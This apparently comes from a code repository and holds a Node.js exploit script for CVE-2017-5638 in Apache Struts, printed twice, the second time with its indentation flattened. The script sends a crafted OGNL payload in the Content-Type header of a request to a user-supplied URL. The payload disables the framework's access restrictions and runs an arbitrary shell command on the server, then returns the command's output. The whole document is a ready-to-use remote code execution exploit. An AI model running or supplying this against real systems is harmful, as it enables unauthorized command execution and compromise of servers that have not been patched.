HayatoDoi/CVE-2017-5638.js

## CVE-2017-5638.js
#!/usr/bin/env node
'use strict';
/**
 * CVE-2017-5638のexploit code
 *
 * File name : CVE-2017-5638.js
 *
 * $ ./CVE-2017-5638.js
 *
 * Copyright (c) 2017, Hayato Doi
 * */
const request = require('request');
// main
if (require.main === module) {{
	checkArgs().then(()=>{
		const url = process.argv[2];
		const cmd = process.argv[3];
		let options = {
			url:url,
			method: "GET",
			headers: {
				"Content-Type":"%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
				"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
			},
		};
		request(options,function(e, res){
			if (e) {
				console.log(e);
			} else {
				console.log(res.body);
			}
		});
	});
}}

function checkArgs(){
	return new Promise((resolve, reject)=>{
		if(process.argv.length !== 4){
			console.error("Argument error!");
			console.error("First argument : url");
			console.error("Second argument : commad");
			process.exit(1);
		} else {
			console.log("===========================================");
			console.log("url : %s",process.argv[1]);
			console.log("cmd : %s",process.argv[2]);
			console.log("===========================================");
			resolve();
		}
	});
}
	#!/usr/bin/env node
	'use strict';
	/**
	* CVE-2017-5638のexploit code
	*
	* File name : CVE-2017-5638.js
	*
	* $ ./CVE-2017-5638.js
	*
	* Copyright (c) 2017, Hayato Doi
	* */
	const request = require('request');
	// main
	if (require.main === module) {{
	checkArgs().then(()=>{
	const url = process.argv[2];
	const cmd = process.argv[3];
	let options = {
	url:url,
	method: "GET",
	headers: {
	"Content-Type":"%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
	"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36",
	},
	};
	request(options,function(e, res){
	if (e) {
	console.log(e);
	} else {
	console.log(res.body);
	}
	});
	});
	}}

	function checkArgs(){
	return new Promise((resolve, reject)=>{
	if(process.argv.length !== 4){
	console.error("Argument error!");
	console.error("First argument : url");
	console.error("Second argument : commad");
	process.exit(1);
	} else {
	console.log("===========================================");
	console.log("url : %s",process.argv[1]);
	console.log("cmd : %s",process.argv[2]);
	console.log("===========================================");
	resolve();
	}
	});
	}